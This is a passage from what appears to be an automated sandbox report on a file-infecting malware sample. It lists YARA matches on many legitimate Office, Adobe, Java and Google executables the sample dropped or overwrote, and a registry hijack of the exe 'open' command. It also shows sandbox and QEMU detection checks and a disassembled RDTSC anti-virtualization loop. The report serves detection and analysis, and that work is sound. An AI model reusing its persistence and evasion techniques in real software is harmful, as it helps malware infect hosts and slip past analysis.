                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Windows\svchost.com, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  Creates an undocumented autostart registry key Show sources
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULLJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion:

                  barindex
                  Tries to detect Any.runShow sources
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
                  Tries to detect virtualization through RDTSC time measurementsShow sources
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exeRDTSC instruction interceptor: First address: 000000000040B86B second address: 000000000040B86B instructions: 0x00000000 rdtsc 0x00000002 cmp di, 00F2h 0x00000007 xor eax, edx 0x00000009 fscale 0x0000000b jmp 00007F8CE03930AFh 0x0000000d cmp bx, 001Bh 0x00000011 dec edi 0x00000012 cmp bh, 0000003Dh 0x00000015 cmp edi, 00000000h 0x00000018 jne 00007F8CE0392FDBh 0x0000001e cmp bl, FFFFFFDCh 0x00000021 mov ebx, 0E247385h 0x00000026 cmp bx, 0084h 0x0000002b xor ebx, 42241BB4h 0x00000031 cmp ax, 0000009Ah 0x00000035 faddp st(3), st(0) 0x00000037 jmp 00007F8CE03930B0h 0x00000039 add ebx, C9881A27h 0x0000003f cmp dx, 009Ch 0x00000044 sub ebx, 15488258h 0x0000004a cmp dl, 00000042h 0x0000004d cmp ch, 0000006Bh 0x00000050 rdtsc
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Windows\svchost.comJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
